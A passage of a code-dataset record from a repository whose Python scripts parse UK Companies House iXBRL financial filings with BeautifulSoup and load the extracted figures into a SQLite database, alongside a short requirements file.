Adding any previously missing column into the sqlite database\n\n if db.dialect.has_table(db, \"fin\"):\n for col in out_pd:\n if col not in db.execute(\"SELECT * FROM fin LIMIT 1\").keys():\n new_col = sqlalchemy.Column(col, sqlalchemy.FLOAT)\n add_column(db, \"fin\", new_col)\n\n # Appending data from DataFrame into sqlite database\n out_pd.to_sql(\"fin\", con=db, if_exists='append', index=False)\n del out_dict\n\n # Moving file into the complete dir\n shutil.move(input_dir + filename, complete_dir)\n\nprintProgressBar(1, 1)\n" }, { "alpha_fraction": 0.7551020383834839, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 17.375, "blob_id": "5f25dc9c41429e131b8b75dc81b9622969827548", "content_id": "d795ef89db29e8ec1042658e610963cd54283d30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 147, "license_type": "no_license", "max_line_length": 21, "num_lines": 8, "path": "/requirements.txt", "repo_name": "DIT-Data/coho_accounts", "src_encoding": "UTF-8", "text": "beautifulsoup4==4.6.3\npandas==0.23.4\nKNime / RapidMiner\nTechnology scraper:\nLinkedIn scraper:\nFacebook scraper:\nParsehub/Octoparse\nAtomic or alike\n" }, { "alpha_fraction": 0.5750459432601929, "alphanum_fraction": 0.5854604840278625, "avg_line_length": 36.38167953491211, "blob_id": "97118272cbc6cd153b812bcb9a2dc771356b55e3", "content_id": "c09a08fcd1e667133d7edc28d671bca4de14bb50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4899, "license_type": "no_license", "max_line_length": 109, "num_lines": 131, "path": "/run2.py", "repo_name": "DIT-Data/coho_accounts", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport os\nimport pandas as pd\nfrom datetime import datetime\nimport sqlalchemy\nimport shutil\n\ndef add_column(engine, table_name, column):\n column_name = column.compile(dialect=engine.dialect)\n column_type = column.type.compile(engine.dialect)\n engine.execute('ALTER TABLE %s ADD COLUMN %s %s' % (table_name, column_name, column_type))\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - 
Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s %s/%s' % (prefix, bar, percent, suffix, iteration, total), end = '', flush=True)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n# Getting directory names\ninput_dir = \"input/\"\ncomplete_dir = \"complete/\"\ncurrent_dir = os.getcwd()\n\n# Create or connect to Database\ndb = sqlalchemy.create_engine(r'sqlite:///'+current_dir+'/chfin.db', echo=False)\n\n# Counters for progress bar\ni = 0\nl = len(os.listdir(input_dir))\n\n# Initialize progressbar\nprintProgressBar(0, l)\nfor filename in os.listdir(input_dir):\n # Update progress bar once every 100 files\n if i % 100 == 0:\n printProgressBar(i + 1, l)\n i += 1\n\n # Extracting date and companies house number\n day = filename[-7:-5]\n month = filename[-9:-7]\n year = filename[-13:-9]\n chn = filename[-22:-14]\n\n # Opening file and looping through figures available\n soup = BeautifulSoup(open(\"%s%s\" % (input_dir, filename), encoding='utf-8'), \"html.parser\")\n table_rows = soup.find_all(name=\"tr\")\n out_dict = {}\n name_checker = {}\n\n for table_row in table_rows:\n\n if len(table_row.find_all(name=\"span\")) > 0:\n\n figures = table_row.find_all(name=\"ix:nonfraction\")\n\n if len(figures) > 0:\n if len(table_row.find_all(name=\"p\")) > 0:\n tr_name = table_row.find_all(name=\"p\")[0].text\n else:\n tr_name = table_row.find_all(name=\"span\")[0].text\n\n # Fixing Column Name and changing format of figures\n # TODO: Check if there are more names than just one. If yes, assign contextref.\n\n for fig in figures:\n key_name = fig[\"name\"].split(\":\")[-1]\n name_checker.setdefault(key_name, 0)\n name_checker[key_name] += 1\n\n for fig in figures:\n key_name = fig[\"name\"].split(\":\")[-1]\n # if name_checker[key_name] > 2:\n # key_name = key_name + \":\" + tr_name\n key_name = key_name + \":\" + tr_name\n # TODO: Multiply by scale and check if value should be negative\n value = float(fig.text.replace(',', '').replace('-', \"0\"))\n out_dict.setdefault(key_name.lower().strip(), []).append(value)\n\n # # Removing additional entries, only including current and previous year figures\n # for key in out_dict:\n # out_dict[key] = out_dict[key][:2]\n\n # Creating a temporary DataFrame\n out_dict_keys = list(out_dict.keys())\n for key in out_dict_keys:\n if len(out_dict[key]) > 2:\n del out_dict[key]\n\n out_pd = pd.DataFrame.from_dict(out_dict, orient='index')\n out_pd = out_pd.transpose()\n out_pd[\"chn\"] = chn\n try:\n if out_pd[\"chn\"].count() > 1:\n se = pd.Series([\"%s/%s/%s\" % (day, month, year), \"%s/%s/%s\" % (day, month, str(int(year)-1))])\n out_pd[\"date\"] = se.values\n else:\n out_pd[\"date\"] = \"%s/%s/%s\" % (day, month, year)\n except:\n out_pd.to_csv(\"out_pd.csv\")\n\n # Adding any previously missing column into the sqlite database\n if db.dialect.has_table(db, \"fin\"):\n for col in out_pd:\n print(db.execute(\"SELECT * FROM fin LIMIT 1\").keys())\n if col not in db.execute(\"SELECT * FROM fin LIMIT 1\").keys():\n new_col = sqlalchemy.Column(col, sqlalchemy.FLOAT)\n add_column(db, \"fin\", new_col)\n\n # Appending data from DataFrame into sqlite database\n out_pd.to_sql(\"fin\", con=db, if_exists='append', index=False)\n del out_pd\n\n # # Moving file into the complete dir\n # shutil.move(input_dir + filename, 
complete_dir)\n\nprintProgressBar(1, 1)\n" } ]
3
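run_xbrli.py in this record walks every ix:nonfraction tag in an iXBRL filing and rescales its text by the sign and scale attributes before storing it. A minimal sketch of that sign/scale arithmetic — the one-line markup string is a made-up example, not a real filing:

from bs4 import BeautifulSoup

doc = '<ix:nonfraction name="core:Creditors" contextref="c1" sign="-" scale="3">1,234</ix:nonfraction>'
fig = BeautifulSoup(doc, "html.parser").find(name="ix:nonfraction")

# sign="-" flips the figure; scale="3" means the reported text is in thousands
multiplier = -1 if fig.get("sign") == "-" else 1
multiplier *= 10 ** int(fig.get("scale", 0))

value = float(fig.text.replace(",", "")) * multiplier
print(value)  # -1234000.0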